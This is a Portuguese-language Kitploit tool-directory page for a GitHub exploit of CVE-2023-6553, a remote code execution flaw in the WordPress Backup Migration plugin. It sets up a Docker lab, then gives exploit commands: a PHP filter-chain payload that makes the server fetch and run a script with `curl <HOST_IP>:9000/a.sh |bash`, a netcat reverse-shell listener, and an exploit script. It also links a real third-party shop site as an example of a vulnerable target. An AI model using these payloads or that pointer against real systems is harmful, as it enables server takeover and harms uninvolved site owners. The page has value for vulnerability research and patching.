Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-6553 — Desenvolvimento de Exploit para CVE-2023-6553 no Plugin de Backup do Wordpress | Kitploit
Ferramentas/GitHubGitHub/harshit-mashru/cve-2023-6553
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

Desenvolvimento de Exploit para CVE-2023-6553 no Plugin de Backup do Wordpress

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-6553

Desenvolvimento de Exploit para CVE-2023-6553 no Plugin Backup do Wordpress

Esta é uma CVE crítica com pontuação CVSS de 9.8

A vulnerabilidade permite que um atacante envie comandos para o servidor que executa a versão vulnerável do plugin

Versão Vulnerável Backup <= 1.3.7

Configuração

  1. faça git clone do repositório

  2. Execute o comando abaixo para configurar os contêineres docker

root@kitploit:~
docker-compose up -d

Você deve ver 2 contêineres docker

  • Wordpress
  • SQL
  1. Agora você pode navegar para o site wordpress no IP do contêiner docker, que também pode ser acessado em
root@kitploit:~
http://localhost:8000/
  1. Para instalar o plugin backup vulnerável, execute o seguinte comando
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. Agora faça login no site wordpress usando o link do passo 3 e instale o plugin backup após baixá-lo com o comando acima

Exploração

  1. Inicie um listener na porta 9000 para receber callbacks quando executarmos o exploit.
root@kitploit:~
python3 -m http.server
  1. Execute o script go usando o seguinte comando a
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. Você receberá o seguinte erro
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

Isso ocorre porque o após as conversões do filtro que o tamanho do cabeçalho excede o que o servidor permite.

  1. Então agora dividimos nosso comando em partes, escrevemos isso em um arquivo no servidor remoto e depois o executamos, mas antes disso temos que iniciar a escuta para obter uma reverse shell
root@kitploit:~
nc -nlvp 8080

e agora execute o comando para explorar o plugin vulnerável

root@kitploit:~
python3 final_exploit.py
  1. Você deve ter uma reverse shell neste ponto

Referências

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • Quão fácil é verificar se a versão vulnerável do wordpress está presente: https://www.thetraveloutlier.com/shop/​
Baixar ferramenta